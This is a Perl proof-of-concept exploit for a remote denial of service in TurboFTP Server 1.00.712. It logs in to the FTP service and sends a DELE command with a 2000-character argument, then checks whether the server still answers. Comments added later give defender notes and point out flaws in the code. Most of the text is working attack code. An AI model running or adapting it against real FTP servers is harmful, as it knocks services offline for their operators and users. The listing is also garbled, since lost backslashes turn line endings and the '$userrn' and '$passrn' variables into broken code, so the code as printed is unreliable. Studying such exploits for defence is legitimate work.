# Title : TurboFTP Server 1.00.712 Remote DoS
# Published : 2010-01-13
# Author : corelanc0d3r
# Exploit Title : TurboFTP Server 1.00.712 Remote DoS
# Date : 30 december 2009
# Author : corelanc0d3r (corelanc0d3r[at]gmail{dot}com)
# Bug found by : corelanc0d3r (corelanc0d3r[at]gmail{dot}com)
# Software Link : http://www.tbsoftinc.com/download/tbftpsrv.exe
# Version : 1.00.712
# Issue fixed in: 1.00.720
# OS : Windows
# Tested on : XP SP3 En (VirtualBox)
# Type of vuln : DoS
# Greetz to : Corelan Security Team::EdiStrosar/Ricks2600/MarkoT/mr_me/ekse
#
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
#
#
# Code :
# Proof-of-concept for the TurboFTP Server 1.00.712 remote DoS named in the
# header. The script logs in to the FTP service with caller-supplied
# credentials, sends one DELE command whose argument is 2000 "A" characters,
# and then opens a second connection to see whether the server still answers.
#
# NOTE(review): this listing appears to have lost its backslashes during
# extraction. The trailing "n" / "nn" in the strings below and the "rn" after
# $user / $pass were presumably "\n" and "\r\n". As printed here, "$userrn"
# and "$passrn" are read by Perl as the names of two other (unset) variables,
# not as $user / $pass followed by a line terminator.
#
# Defender notes, from what the code shows:
#   - The long command is sent only after USER/PASS, so the request needs an
#     account the server accepts.
#   - The only unusual thing on the wire is a DELE argument of 2000 bytes; a
#     length limit on FTP command arguments (proxy, IDS rule, or server
#     setting) covers this pattern.
#   - The header states the issue is fixed in 1.00.720.
#
# NOTE(review): no "use strict" / "use warnings" is visible in this listing,
# and $sock, $ftp and $sock2 are used without "my".

# Banner (ASCII art; spacing was collapsed by the page extraction).
print "|------------------------------------------------------------------|n";
print "| __ __ |n";
print "| _________ ________ / /___ _____ / /____ ____ _____ ___ |n";
print "| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ |n";
print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |n";
print "| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |n";
print "| |n";
print "| http://www.corelan.be:8800 |n";
print "| |n";
print "|-------------------------------------------------[ EIP Hunters ]--|nn";
print "[+] DoS exploit for TurboFTP Server 1.00.712 n";
use IO::Socket;
# Exactly four arguments are required ($#ARGV is the last index, so 3 means
# four). "ne" is the string comparison operator; it gives the expected result
# here only because the number stringifies to "3". The usage path exits with
# status 0, so a caller cannot tell it apart from a normal run.
if ($#ARGV ne 3) {
print "n usage: $0 <targetip> <targetport> <user> <password>n";
exit(0);
}
# Credentials are taken from the command line and used as given.
my $user=$ARGV[2];
my $pass=$ARGV[3];
print " [+] Preparing DoS payloadn";
# The DELE argument: 2000 repetitions of the letter "A", nothing else.
my $payload = "A" x 2000;
print " [+] Connecting to server $ARGV[0] on port $ARGV[1]n";
# The constructor's return value is not checked; a failed connect is only
# noticed when the first read below yields nothing and the "|| die" fires.
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => $ARGV[1],
Proto => 'tcp');
$ftp = <$sock> || die " [!] *** Unable to connect ***n";
print " ** $ftp";
# A second line is read before anything is sent -- presumably the server's
# greeting spans two lines; TODO confirm against the target version.
$ftp = <$sock>;
print " ** $ftp";
print " [+] Logging in (user $user)n";
# Each command is followed by a single line read; the reply is echoed but
# never inspected, so a rejected login is not detected by the script.
print $sock "USER $userrn";
$ftp = <$sock>;
print " ** $ftp";
print $sock "PASS $passrn";
$ftp = <$sock>;
print " ** $ftp";
print " [+] Sending payloadn";
# The one request this PoC is about: DELE followed by the 2000-byte argument.
print $sock "DELE ".$payload."rn";
$ftp = <$sock>;
print " ** $ftp";
print " [+] Payload sent, now checking FTP server staten";
# Liveness check: a fresh connection is opened and one line is read. An empty
# read is reported as success. NOTE(review): an empty read could also come
# from an unrelated connection failure, so this result is only indicative.
$sock2 = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => $ARGV[1],
Proto => 'tcp');
my $ftp2 = <$sock2> || die " [+] DoS successfuln";
print " [!] DoS did not seem to workn";
print " ** $ftp2n";